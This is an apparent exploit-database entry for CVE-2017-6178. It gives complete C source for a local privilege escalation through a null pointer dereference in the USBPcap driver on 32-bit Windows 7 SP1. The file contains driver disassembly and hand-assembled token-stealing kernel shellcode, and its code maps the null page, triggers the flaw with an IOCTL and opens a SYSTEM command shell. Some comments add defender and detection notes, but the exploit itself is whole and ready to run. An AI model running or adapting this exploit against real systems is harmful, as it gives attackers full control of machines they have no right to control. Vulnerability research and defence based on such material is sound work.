"USBPcap 1.1.0.0 (WireShark 2.2.5) - Local Privilege Escalation"

Author


"Parvez Anwar"

Platform


windows

Release date


2017-03-07

/*

Exploit Title    - USBPcap Null Pointer Dereference Privilege Escalation
Date             - 07th March 2017
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - http://desowin.org/usbpcap/ 
Tested Version   - 1.1.0.0  (USB Packet capture for Windows bundled with WireShark 2.2.5)
Driver Version   - 1.1.0.0 - USBPcap.sys
Tested on OS     - 32bit Windows 7 SP1 
CVE ID           - CVE-2017-6178
Vendor fix url   - not yet
Fixed Version    - 0day
Fixed driver ver - 0day


USBPcap.sys
-----------

.text:992AF494 loc_992AF494:                                                         
.text:992AF494                 mov     ecx, [edi+8]                                  ; DeviceObject
.text:992AF494                                                                       
.text:992AF497                 inc     byte ptr [esi+23h]
.text:992AF49A                 add     dword ptr [esi+60h], 24h
.text:992AF49E                 mov     edx, esi                                      ; Irp
.text:992AF4A0                 call    ds:IofCallDriver                              ; IofCallDriver function called without validating values !!!
.text:992AF4A6                 push    18h                                           ; RemlockSize
.text:992AF4A8                 push    esi                                           ; Tag
.text:992AF4A9                 push    ebx                                           ; RemoveLock
.text:992AF4AA                 mov     edi, eax
.text:992AF4AC                 call    ds:IoReleaseRemoveLockEx
.text:992AF4B2                 mov     eax, edi



kd> u nt!IofCallDriver
.
.
.
82a7111b eb0c            jmp     nt!IofCallDriver+0x63 (82a71129)
82a7111d 8b4608          mov     eax,dword ptr [esi+8] ds:0023:00000008=????????        <------------ null pointer dereference
82a71120 52              push    edx
82a71121 0fb6c9          movzx   ecx,cl
82a71124 56              push    esi
82a71125 ff548838        call    dword ptr [eax+ecx*4+38h]                              <------------ control flow of execution
82a71129 5e              pop     esi
82a7112a 59              pop     ecx
82a7112b 5d              pop     ebp
82a7112c c3              ret


*/



#include <stdio.h>
#include <windows.h>

#define BUFSIZE 4096   /* size of both the scratch buffer written to the low page and the RWX allocation below */


/*
 * Function-pointer type for ntdll!NtAllocateVirtualMemory, which is not exported by
 * the public import libraries and is therefore resolved at runtime with GetProcAddress.
 * Note: RegionSize is declared PULONG, but main() passes the address of an int; the
 * compiler should warn about that pointer mismatch.  The identifier itself starts with
 * an underscore followed by an upper-case letter, a name reserved for the implementation.
 */
typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
     IN HANDLE ProcessHandle,
     IN OUT PVOID *BaseAddress,
     IN ULONG ZeroBits,
     IN OUT PULONG RegionSize,
     IN ULONG AllocationType,
     IN ULONG Protect);



// Windows 7 SP1
// Kernel structure offsets for one specific build (32-bit Windows 7 SP1, per the header).
// They are baked into the token_steal_w7 byte array below, which ties the payload to that
// build; there is no runtime detection of the OS version anywhere in this file.

#define W7_KPROCESS 0x50      // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN    0xf8      // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID     0xb4      // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS  0xb8      // Offset to ActiveProcessLinks _EPROCESS struct


/*
 * Kernel-mode payload reached through the hijacked indirect call in IofCallDriver
 * (see the disassembly in the file header).  It walks the ActiveProcessLinks list
 * from the current _EPROCESS until it finds UniqueProcessId == 4 (the System process),
 * copies that process's Token pointer over the current process's Token, restores the
 * registers and unwinds part of the caller's frame before returning.
 *
 * Every offset comes from the W7_* defines above and is valid only for 32-bit
 * Windows 7 SP1; on any other build the reads will presumably land on the wrong
 * fields and the machine will most likely bugcheck rather than escalate.
 * Detection note for defenders: the observable effect is a user-mode process whose
 * primary token suddenly becomes the System token without a corresponding logon.
 */
BYTE token_steal_w7[] =
{
  0x60,                                                  // pushad                         Saves all registers
  0x64,0xA1,0x24,0x01,0x00,0x00,                         // mov eax, fs:[eax+124h]         Retrieve ETHREAD
  0x8b,0x40,W7_KPROCESS,                                 // mov eax, [eax+W7_KPROCESS]     Retrieve _KPROCESS
  0x8b,0xc8,                                             // mov ecx, eax                   Current _EPROCESS structure
  0x8b,0x98,W7_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+W7_TOKEN]        Retrieves TOKEN
  0x8b,0x80,W7_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+W7_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
  0x81,0xe8,W7_APLINKS,0x00,0x00,0x00,                   // sub eax, W7_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
  0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+W7_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
  0x75,0xe8,                                             // jne                     ---- 
  0x8b,0x90,W7_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+W7_TOKEN]        Retrieves TOKEN and stores on EDX
  0x89,0x91,0xF8,0x00,0x00,0x00,                         // mov [ecx+W7_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS (0xF8 is W7_TOKEN written as a literal)
  0x61,                                                  // popad                          Restores all registers
  0x83,0xc4,0x18,                                        // add esp,18                     NOTE(review): presumably discards the frame of the hijacked call - confirm against the disassembly
  0xc3                                                   // ret 
};





/*
 * Launch an interactive cmd.exe in a new console window.
 *
 * Called unconditionally after the IOCTL is sent; nothing here checks whether the
 * kernel payload actually replaced the process token, so if the escalation did not
 * happen this simply starts a shell with the caller's existing privileges.  The child
 * inherits handles (bInheritHandles = TRUE).  Both returned handles are closed at once,
 * which leaves the child running independently.  On failure the error is printed and
 * the function returns; there is no return value for the caller to inspect.
 */
void spawnShell()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;


    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);

    si.cb          = sizeof(si);   /* redundant: already assigned above */
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;

    /* lpCommandLine is a string literal; the documented contract allows CreateProcess
     * to write into that buffer, so a writable array would be the strictly correct form. */
    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
    {
       /* GetLastError() returns a DWORD; %lu would be the matching conversion. */
       printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
       return;
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}



/*
 * Exploit driver for CVE-2017-6178 (USBPcap.sys, see header).  The steps happen in
 * this order and each depends on the previous one:
 *
 *   1. allocate RWX memory with VirtualAlloc and copy token_steal_w7 into it;
 *   2. ask NtAllocateVirtualMemory for a region at base address 0x1 — the kernel read
 *      shown in the header dereferences address 8 with esi == NULL, so this step must
 *      end up backing the lowest page of the process with memory;
 *   3. write a BUFSIZE scratch buffer over that low region with the address of the
 *      payload planted at a fixed offset, which is what the kernel call chain
 *      ([esi+8] then [eax+ecx*4+38h]) eventually reaches;
 *   4. open \\.\usbpcap1 and send IOCTL 0x00090028 with no input or output buffers,
 *      which reaches the unvalidated IofCallDriver call in the driver;
 *   5. spawn cmd.exe, which inherits the current process token.
 *
 * Nothing after the IOCTL verifies that the token was actually replaced, and the
 * return value of DeviceIoControl is ignored.  argc/argv are unused.
 *
 * Defender notes: the driver-side fix is to validate the device object and IRP before
 * handing the request to IofCallDriver; the user-mode precondition is the ability to
 * map the bottom of the address space (step 2), which later Windows releases are
 * understood to refuse for normal processes — confirm for the platform in question.
 * Opening the USBPcap control device from a standard user account is the observable
 * trigger; restricting the device's DACL removes the attack surface entirely.
 */
int main(int argc, char *argv[]) 
{

    _NtAllocateVirtualMemory    NtAllocateVirtualMemory;
    LPVOID                      addrtoshell;                /* RWX allocation holding the payload */
    NTSTATUS                    allocstatus;
    LPVOID                      base_addr = (LPVOID)0x00000001;   /* requested base for the low-page mapping */
    DWORD                       written;
    int                         rwresult;
    int                         size = BUFSIZE;             /* passed as RegionSize; the typedef expects PULONG */
    HANDLE                      hDevice;
    DWORD                       dwRetBytes = 0;    
    unsigned char               buffer[BUFSIZE];            /* zero-filled scratch image written to the low page */
    unsigned char               devhandle[MAX_PATH];        /* device path string, built below */



    printf("-------------------------------------------------------------------------------\n");
    printf("           USBPCAP (usbpcap.sys) Null Pointer Dereference EoP Exploit          \n");
    printf("                        Tested on Windows 7 SP1 (32bit)                        \n");
    printf("-------------------------------------------------------------------------------\n\n");


    /* Builds "\\.\usbpcap1"; the trailing 1 is the first capture-filter device instance. */
    sprintf(devhandle, "\\\\.\\%s", "usbpcap1");

    /* Step 1: executable memory for the kernel payload. */
    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(addrtoshell == NULL)
    {
        printf("[-] VirtualAlloc memory allocation failure %.8x\n\n", GetLastError());
        return -1;
    }
    printf("[+] VirtualAlloc memory allocated at %p\n", addrtoshell);

    memcpy(addrtoshell, token_steal_w7, sizeof(token_steal_w7));
    /* sizeof yields size_t; %d is the wrong conversion for it (use %zu). */
    printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));

    NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
 	
    if (!NtAllocateVirtualMemory)
    {
        printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
        return -1;  
    }

    printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
    printf("[+] Allocating memory at [0x%p]\n", base_addr);
	 
    /* Step 2: INVALID_HANDLE_VALUE (-1) doubles as the current-process pseudo-handle.
     * Any non-zero NTSTATUS is treated as failure. */
    allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (allocstatus) 
    {
        printf("[-] An error occured while mapping executable memory (0x%08x) %d\n\n", allocstatus, GetLastError());
        return -1;
    }
    printf("[+] NtAllocateVirtualMemory successful\n");

    /* Step 3: zero the scratch image and plant the 4-byte payload pointer at offset 0x6b,
     * i.e. at address 0x6c once the buffer is written starting from address 1. */
    memset(buffer, 0x00, BUFSIZE);
    memcpy(buffer+0x0000006b, &addrtoshell, 4);

    /* Writes into the current process (pseudo-handle again); the mapping from step 2
     * is what makes the destination address valid. */
    rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);

    if (rwresult == 0)
    {
        printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
        return -1;
    }
    printf("[+] WriteProcessMemory %d bytes written\n", written);  

    printf("[+] Device handle %s\n", devhandle);
    
    /* Step 4: open the control device with no access rights requested (dwDesiredAccess = 0). */
    hDevice = CreateFile(devhandle, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
        return -1;
    }
    else 
    {
        printf("[+] Open %s device successful\n", devhandle);
    }

    printf("[~] Press any key to send Exploit  . . .\n");
    /* getch() comes from <conio.h>, which this file does not include; it relies on an
     * implicit declaration. */
    getch();

    /* The IOCTL result is not checked; success is only inferred from the shell that follows. */
    DeviceIoControl(hDevice, 0x00090028, NULL, 0, NULL, 0, &dwRetBytes, NULL);

    CloseHandle(hDevice);

    /* Step 5 */
    printf("[+] Spawning SYSTEM Shell\n");
    spawnShell();

    return 0;
}